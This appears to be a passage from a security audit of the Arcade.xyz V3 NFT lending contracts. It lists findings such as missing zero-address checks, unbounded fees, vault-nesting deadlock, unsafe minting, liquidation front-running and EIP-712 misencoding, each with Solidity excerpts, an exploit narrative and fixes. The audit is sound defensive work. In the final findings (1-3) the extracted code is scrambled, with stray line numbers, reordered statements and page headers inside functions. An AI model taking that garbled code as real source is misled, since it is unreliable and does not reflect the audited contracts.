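    payable(to).sendValue(balance);

    emit ClaimFees(to, balance);
}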
Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the passed along 2,300 units of gas. Recommendations Short term, consider replacing the claimFees function's use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benefit of being able to one day add logic in the fee recipient's receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sufficient for those recipients.

+8. Risk of lost funds due to lack of zero-address check in functions Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-8 Target: contracts/vault/VaultFactory.sol, contracts/RepaymentController.sol, contracts/LoanCore.sol Description The VaultFactory.claimFees (figure 8.1), RepaymentController.redeemNote (figure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address.

function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) {
    uint256 balance = address(this).balance;
    payable(to).transfer(balance);

    emit ClaimFees(to, balance);
}

Figure 8.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol

function redeemNote(uint256 loanId, address to) external override {
    LoanLibrary.LoanData memory data = loanCore.getLoan(loanId);
    (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId);

    if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state);

    address lender = lenderNote.ownerOf(loanId);
    if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender);

    uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR;

    loanCore.redeemNote(loanId, redeemFee, to);
}

Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol

Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address.
+9. The maximum value for FL_09 is not set by FeeController
Severity: Low
Difficulty: High
Type: Data Validation
Finding ID: TOB-ARCADE-9
Target: contracts/FeeController.sol

Description
The FeeController constructor initializes the maximum values for all of the fees defined in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because no maximum is set, that particular fee can be set to any amount, with no upper bound. The lender's redeem fee is used in RepaymentController's redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally set the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol.

constructor() {
    /// @dev Vault mint fee - gross
    maxFees[FL_01] = 1 ether;

    /// @dev Origination fees - bps
    maxFees[FL_02] = 10_00;
    maxFees[FL_03] = 10_00;

    /// @dev Rollover fees - bps
    maxFees[FL_04] = 20_00;
    maxFees[FL_05] = 20_00;

    /// @dev Loan closure fees - bps
    maxFees[FL_06] = 10_00;
    maxFees[FL_07] = 50_00;
    maxFees[FL_08] = 10_00;
}

Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol

function redeemNote(uint256 loanId, address to) external override {
    LoanLibrary.LoanData memory data = loanCore.getLoan(loanId);
    (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId);

    if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state);

    address lender = lenderNote.ownerOf(loanId);
    if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender);

    uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR;

    loanCore.redeemNote(loanId, redeemFee, to);
}

Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol

Exploit Scenario
Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDER_REDEEM_FEE to 5%, but he accidentally types an extra 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and eroding trust in the team.

Recommendations
Short term, set a maximum boundary for the FL_09 fee in FeeController's constructor.

Long term, improve the test suite to ensure that all fee-changing functions are tested with out-of-bounds values for all fees, not just FL_02.
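As a sketch of the short-term recommendation, the constructor could bound FL_09 alongside the other closure fees; the 10_00 value (10% in basis points) is hypothetical, chosen only to match the scale of the neighboring fees, and the appropriate bound is a protocol decision:

constructor() {
    // ... existing maxFees initializations (FL_01 through FL_08) ...

    /// @dev Lender redeem fee - bps (previously missing)
    maxFees[FL_09] = 10_00;
}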
+10. Fees can be changed while a loan is active
Severity: Low
Difficulty: High
Type: Timing
Finding ID: TOB-ARCADE-10
Target: contracts/FeeController.sol

Description
All fees in the protocol are calculated using the current fee values, as reported by the FeeController contract. However, the team can change these fees at any time, so the effective rollover and closure fees that users will pay can change after their loans have been initialized; as a result, these fees are impossible to know in advance.

For example, in the code shown in figure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can differ from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and in other functions in RepaymentController.

function _prepareRepay(uint256 loanId) internal view returns (uint256 amountFromBorrower, uint256 amountToLender) {
    LoanLibrary.LoanData memory data = loanCore.getLoan(loanId);
    if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert RC_CannotDereference(loanId);
    if (data.state != LoanLibrary.LoanState.Active) revert RC_InvalidState(data.state);

    LoanLibrary.LoanTerms memory terms = data.terms;
    uint256 interest = getInterestAmount(terms.principal, terms.proratedInterestRate);
    uint256 interestFee = (interest * feeController.get(FL_07)) / BASIS_POINTS_DENOMINATOR;
    uint256 principalFee = (terms.principal * feeController.get(FL_08)) / BASIS_POINTS_DENOMINATOR;

    amountFromBorrower = terms.principal + interest;
    amountToLender = amountFromBorrower - interestFee - principalFee;
}

Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol

Exploit Scenario
Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team changed the fees while their loan was active. Lucy's earnings are now different from what she expected.

Recommendations
Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those stored values for the full lifetime of the loan.

Long term, document all of the conditions that are agreed on by the counterparties and that should remain constant during the lifetime of a loan, and make sure they are preserved. Add a specific integration or fuzzing test for these conditions.
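A sketch of the short-term recommendation; the lenderInterestFee and lenderPrincipalFee fields are hypothetical additions to LoanLibrary.LoanTerms, populated once at origination:

// At origination (e.g., in LoanCore), snapshot the current fee values into
// the stored loan terms so that later FeeController changes cannot affect
// this loan:
terms.lenderInterestFee = feeController.get(FL_07);
terms.lenderPrincipalFee = feeController.get(FL_08);

// In _prepareRepay, read the snapshot instead of querying FeeController:
uint256 interestFee = (interest * terms.lenderInterestFee) / BASIS_POINTS_DENOMINATOR;
uint256 principalFee = (terms.principal * terms.lenderPrincipalFee) / BASIS_POINTS_DENOMINATOR;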
+11. Asset vault nesting can lead to loss of assets
Severity: Low
Difficulty: High
Type: Access Controls
Finding ID: TOB-ARCADE-11
Target: contracts/vault/VaultFactory.sol, contracts/vault/AssetVault.sol

Description
Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X) could result in a situation in which multiple asset vaults own each other, creating a deadlock that prevents the assets in the affected vaults from ever being withdrawn.

Asset vaults are designed to hold different types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (figure 11.1) when the asset vault is deployed through the VaultFactory contract.

function initializeBundle(address to) external payable override returns (uint256) {
    uint256 mintFee = feeController.get(FL_01);

    if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, mintFee);

    address vault = _create();

    _mint(to, uint256(uint160(vault)));

    emit VaultCreated(vault, to);

    if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - mintFee);

    return uint256(uint160(vault));
}

Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol

To add an ERC-721 asset to an asset vault, the asset needs to be transferred to the asset vault's address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of one asset vault to another simply by transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vault's ERC-721 token) needs to enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function.

function enableWithdraw() external override onlyOwner onlyWithdrawDisabled {
    withdrawEnabled = true;
    emit WithdrawEnabled(msg.sender);
}

Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol

function withdrawERC721(
    address token,
    uint256 tokenId,
    address to
) external override onlyOwner onlyWithdrawEnabled {
    _withdrawERC721(token, tokenId, to);
}

Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol

Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it is impossible for a user to enable or perform withdrawals on the affected vaults, permanently locking all of the assets (ERC-721, ERC-1155, ERC-20, ETH) within them.

The severity of the issue depends on the UI, which was out of scope for this review; if the UI does not prevent vaults from owning each other, the severity is higher. In terms of likelihood, the issue requires a user to make a mistake (although one far more likely than transferring tokens to a random address) and requires the UI to fail to detect the mistake and prevent it or warn the user. We therefore rated the difficulty of this issue as high.

Exploit Scenario
Alice decides to borrow USDC by putting up some of her NFTs as collateral:

1. Alice uses the UI to create an asset vault (vault A) and transfers five of her CryptoPunks to the asset vault.
2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the "Add Asset" option.
3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on "Add", the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A.
4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on "Add Assets", and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A.
5. Alice is confused and wonders whether adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead. The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault.

Recommendations
Short term, take one of the following actions:
● Disallow the nesting of asset vaults; that is, prevent users from transferring ownership of an asset vault to another asset vault. This would prevent the issue altogether.
● If asset vault nesting is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue.

Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests to ensure that these edge cases are handled correctly and that users do not lose access to their assets. Beyond unit tests, we recommend writing invariants and testing them using property-based testing with Echidna.
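A sketch of the first short-term option, enforcing the restriction at the contract level rather than in the UI. Because a vault's ownership token ID is the uint160 value of the vault's address (figure 11.1), an address is a factory-created vault exactly when a token with its derived ID exists. The VF_NoVaultNesting error is a hypothetical name, and the hook signature assumes an OpenZeppelin 4.x ERC721 base (the hook gains a batchSize parameter in 4.8+):

// In VaultFactory: block transfers of vault-ownership tokens to addresses
// that are themselves vaults minted by this factory, preventing nesting.
function _beforeTokenTransfer(
    address from,
    address to,
    uint256 tokenId
) internal override {
    if (_exists(uint256(uint160(to)))) revert VF_NoVaultNesting(to);
    super._beforeTokenTransfer(from, to, tokenId);
}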
+12. Risk of locked assets due to use of _mint instead of _safeMint
Severity: Medium
Difficulty: Low
Type: Undefined Behavior
Finding ID: TOB-ARCADE-12
Target: contracts/vault/VaultFactory.sol, contracts/PromissoryNote.sol

Description
The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contract's ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable.

function initializeBundle(address to) external payable override returns (uint256) {
    uint256 mintFee = feeController.get(FL_01);

    if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, mintFee);

    address vault = _create();

    _mint(to, uint256(uint160(vault)));

    emit VaultCreated(vault, to);

    if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - mintFee);

    return uint256(uint160(vault));
}

Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol

function mint(address to, uint256 loanId) external override returns (uint256) {
    if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert PN_MintingRole(msg.sender);

    _mint(to, loanId);
    return loanId;
}

Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol

The _safeMint function's built-in safety check ensures that the recipient contract implements the ERC721Receiver interface, verifying its ability to receive and manage ERC-721 tokens.

function _safeMint(
    address to,
    uint256 tokenId,
    bytes memory _data
) internal virtual {
    _mint(to, tokenId);
    require(
        _checkOnERC721Received(address(0), to, tokenId, _data),
        "ERC721: transfer to non ERC721Receiver implementer"
    );
}

Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol

The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract and expects a return value containing the bytes4 selector of onERC721Received. Passing this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens.

Note that _safeMint does allow for reentrancy through its call to _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the affected Arcade functions (figures 12.1 and 12.2), this poses no risk.

Exploit Scenario
Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used as collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, the asset vault token is stuck within her smart wallet contract, which has no mechanism to handle ERC-721 tokens, and both the vault and the CryptoPunks NFT it holds become irretrievable.

Recommendations
Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, mitigating the risk that NFTs could become frozen.

Long term, enhance the unit testing suite. The tests should cover more negative paths and potential edge cases, which will help uncover hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system.
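A sketch of the short-term fix for PromissoryNote.mint; the same one-line substitution applies to the _mint call in VaultFactory.initializeBundle:

function mint(address to, uint256 loanId) external override returns (uint256) {
    if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert PN_MintingRole(msg.sender);

    // _safeMint reverts if "to" is a contract that does not implement
    // onERC721Received, preventing the note from being irretrievably locked
    _safeMint(to, loanId);
    return loanId;
}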
+13. Borrowers cannot realize full loan value without risking default
Severity: Medium
Difficulty: Low
Type: Timing
Finding ID: TOB-ARCADE-13
Target: contracts/LoanCore.sol

Description
To fully capitalize on their loans, borrowers need to retain the loaned assets and the owed interest for the entire term of their loans. However, a borrower who waits until the loan's maturity date to repay becomes immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrower's collateral.

// First check if the call is being made after the due date.
uint256 dueDate = data.startDate + data.terms.durationSecs;
if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate);

Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol

Owing to the inherent nature of the blockchain, achieving precise synchronization between block.timestamp and dueDate is practically impossible. Moreover, repaying a loan before the dueDate forfeits some of the loan's inherent value because the protocol's interest assessment design does not refund any part of the interest for early repayment.

In a scenario in which block.timestamp is greater than dueDate, a lender can preempt a borrower's repayment attempt, invoke the claim function, and liquidate the borrower's collateral. Collateral will frequently be worth more than the loaned assets, giving lenders an incentive to do this.

Given the protocol's interest assessment design, the Arcade team should implement a grace period following the maturity date during which no interest beyond the amount agreed to in the loan terms is assessed. This buffer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral.

Exploit Scenario
Alice, a borrower, takes out a loan from Eve using Arcade's NFT lending protocol. Alice deposits her rare CryptoPunk as collateral; it is more valuable than the assets loaned to her, so her position is over-collateralized. Alice plans to hold the lent assets for the entire duration of the loan period in order to maximize her benefit-to-cost ratio. Eve, the lender, monitors the blockchain for the moment when block.timestamp exceeds the dueDate so that she can call the claim function and liquidate Alice's CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alice's CryptoPunk collateral.

Recommendations
Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buffer would give the borrower sufficient time to repay the loan without the risk of immediate collateral liquidation.

Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarification.
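A sketch of the short-term recommendation applied to the check from figure 13.1; GRACE_PERIOD is a hypothetical constant whose length (and whether interest accrues during it) is a protocol decision:

// Liquidation is allowed only after the due date plus a grace period,
// so a borrower repaying exactly at term cannot be front-run by claim().
uint256 public constant GRACE_PERIOD = 1 days; // hypothetical value

uint256 dueDate = data.startDate + data.terms.durationSecs;
if (block.timestamp <= dueDate + GRACE_PERIOD) revert LC_NotExpired(dueDate);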
+14. itemPredicates encoded incorrectly according to EIP-712
Severity: Low
Difficulty: Low
Type: Configuration
Finding ID: TOB-ARCADE-14
Target: contracts/OriginationController.sol

Description
The itemPredicates parameter is not encoded correctly, so the signer cannot see the verifier address when signing. The verifier address receives each batch of listed assets to check them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction.

According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as defined in EIP-712:

hashStruct(s : 𝕊) = keccak256(typeHash ‖ encodeData(s))
where typeHash = keccak256(encodeType(typeOf(s)))

In the protocol, the recoverItemsSignature function hashes an array of Predicate structs that is passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then bound into the signed struct as the bytes32 itemsHash member declared in _ITEMS_TYPEHASH.

(bytes32 sighash, address externalSigner) = recoverItemsSignature(
    loanTerms,
    sig,
    nonce,
    neededSide,
    keccak256(abi.encode(itemPredicates))
);

Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol

// solhint-disable max-line-length
bytes32 private constant _ITEMS_TYPEHASH =
    keccak256(
        "LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)"
    );

Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol

However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulate the following:

"The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing five members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undefined for cyclical data."

Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash.

Exploit Scenario
Alice creates a loan offering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alice's loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verifier contract because that information is not encoded as EIP-712 typed data that his wallet can display.

Recommendations
Short term, adjust the encoding of itemPredicates to comply with the EIP-712 standard: iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH definition so that the Predicate typeHash definition is appended to it, and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verifier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard.

Long term, strictly adhere to established Ethereum standards such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem; violating them can lead to unforeseen security vulnerabilities.
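A sketch of EIP-712-compliant encoding for the array, assuming a Predicate struct with (bytes data, address verifier) fields; the exact fields and the _PREDICATE_TYPEHASH string below are illustrative, not the codebase's definitions:

bytes32 private constant _PREDICATE_TYPEHASH =
    keccak256("Predicate(bytes data,address verifier)");

function _hashPredicates(LoanLibrary.Predicate[] memory predicates) internal pure returns (bytes32) {
    bytes32[] memory hashes = new bytes32[](predicates.length);
    for (uint256 i = 0; i < predicates.length; ++i) {
        // each struct is hashed with its typeHash; dynamic bytes members
        // are themselves hashed, per the EIP-712 encodeData rules
        hashes[i] = keccak256(
            abi.encode(
                _PREDICATE_TYPEHASH,
                keccak256(predicates[i].data),
                predicates[i].verifier
            )
        );
    }
    // the array value is the hash of the concatenated member hashes
    return keccak256(abi.encodePacked(hashes));
}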
+15. The fee values can distort the incentives for the borrowers and lenders
Severity: Informational
Difficulty: High
Type: Data Validation
Finding ID: TOB-ARCADE-15
Target: contracts/FeeController.sol

Description
Arcade V3 contains nine fee settings. Six of these fees are paid by the lender, two are paid by the borrower, and the remaining fee is paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties.

For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted. In the first case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan.
In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral.

The fees paid based on the outcome of a loan can create an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, benefiting the original lenders by saving them the closing fees and harming the borrowers by indirectly raising interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to roll over loans.

In summary, such fine-grained control over the fee settings introduces hard-to-predict incentive scenarios that can scare users away or cause users who do not account for fees to inadvertently lose profits.

Recommendations
Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment a loan is opened, as well as the various possible outcomes, including the expected net profits if the loan is repaid, rolled over, defaulted, or redeemed.

Long term, add interactive ways for users to calculate their expected profits, such as a loan simulator.
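To make the incentive effect concrete with purely hypothetical numbers: if the lender origination fee were 1% and the lender rollover fee 0.5%, a lender funding a 100 ETH loan would pay 1 ETH to originate a new loan but only 0.5 ETH to roll over an existing one, so rational lenders would favor rollovers; if the two values were reversed, the preference would flip. The profitability of otherwise identical positions therefore depends entirely on the fee configuration in force at each point in the loan's lifecycle.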
) external override onlyOwner onlyWithdrawEnabled { uint256 tokensLength = tokens.length; if (tokensLength > MAX_WITHDRAW_ITEMS) revert address[] calldata tokens, uint256[] calldata tokenIds, TokenType[] calldata tokenTypes, address to function withdrawBatch( 193 194 195 196 197 198 199 200 AV_TooManyItems(tokensLength); 201 202 AV_LengthMismatch("tokenType"); 203 204 205 206 if (to == address(0)) revert AV_ZeroAddress(); for (uint256 i = 0; i < tokensLength; i++) { if (tokens[i] == address(0)) revert AV_ZeroAddress(); if (tokensLength != tokenIds.length) revert AV_LengthMismatch("tokenId"); if (tokensLength != tokenTypes.length) revert 22 Arcade.xyz V3 Security Assessment Figure 1.1: A snippet of the withdrawBatch function in arcade-protocol/contracts/vault/AssetVault.sol Additionally, the CryptoPunks NFT contract does not follow the ERC-721 and ERC-1155 standards and contains no check that prevents funds from being transferred to the zero address (and the function is called transferPunk instead of the standard transfer). An explicit check to ensure that to is not the zero address inside the withdrawPunk function is therefore recommended. 114 115 116 117 118 119 120 121 122 123 124 125 126 it. 127 128 129 130 131 132 133 134 function transferPunk(address to, uint punkIndex) { if (!allPunksAssigned) throw; if (punkIndexToAddress[punkIndex] != msg.sender) throw; if (punkIndex >= 10000) throw; if (punksOfferedForSale[punkIndex].isForSale) { punkNoLongerForSale(punkIndex); } punkIndexToAddress[punkIndex] = to; balanceOf[msg.sender]--; balanceOf[to]++; Transfer(msg.sender, to, 1); PunkTransfer(msg.sender, to, punkIndex); // Check for the case where there is a bid from the new owner and refund // Any other bid can stay in place. Bid bid = punkBids[punkIndex]; if (bid.bidder == to) { // Kill bid and refund value pendingWithdrawals[to] += bid.value; punkBids[punkIndex] = Bid(false, punkIndex, 0x0, 0); } } Figure 1.2: The transferPunk function in CryptoPunksMarket contract (Etherscan) Lastly, there is no string argument to the AV_ZeroAddress error to indicate which variable equaled the zero address and caused the revert, unlike the AV_LengthMismatch error. For example, in the batch function (figure 1.1), the AV_ZeroAddress could be thrown in line 203 or 206. Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that interacts with an AssetVault contract. In his implementation, he catches specific errors that are thrown so that he can show an informative message to the user. Because the batch and withdrawal functions throw different errors when to is the zero address, he needs to write two versions of error handlers instead of just one. 23 Arcade.xyz V3 Security Assessment Recommendations Short term, add the zero address check with the custom error to the _withdrawERC721 and _withdrawERC1155 functions. This will cause the same custom error to be thrown for all of the single and batch NFT withdrawal functions. Also, add an explicit zero-address check inside the withdrawPunk function. Lastly, add a string argument to the AV_ZeroAddress custom error that is used to indicate the name of the variable that triggered the error (similar to the one in AV_LengthMismatch). Long term, ensure consistency in the errors thrown throughout the implementation. This will allow users and developers to understand errors that are thrown and will allow the Arcade team to test fewer errors. 24 Arcade.xyz V3 Security Assessment +2. 
Solidity compiler optimizations can be problematic Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-2 Target: hardhat.config.ts Description Arcade has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe. 147 148 149 150 optimizer: { enabled: optimizerEnabled, runs: 200, }, Figure 2.1: The solc optimizer settings in arcade-protocol/hardhat.config.ts High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. Another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that future optimizations will introduce new bugs. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js—causes a security vulnerability in the Arcade contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 25 Arcade.xyz V3 Security Assessment +3. callApprove does not follow approval best practices Severity: Informational Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-ARCADE-3 Target: contracts/vault/AssetVault.sol Description The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocol’s integration with third-party contracts or off-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 
26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeIncreaseAllowance( function safeDecreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, "SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: ● Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. ● Add two new functions in the 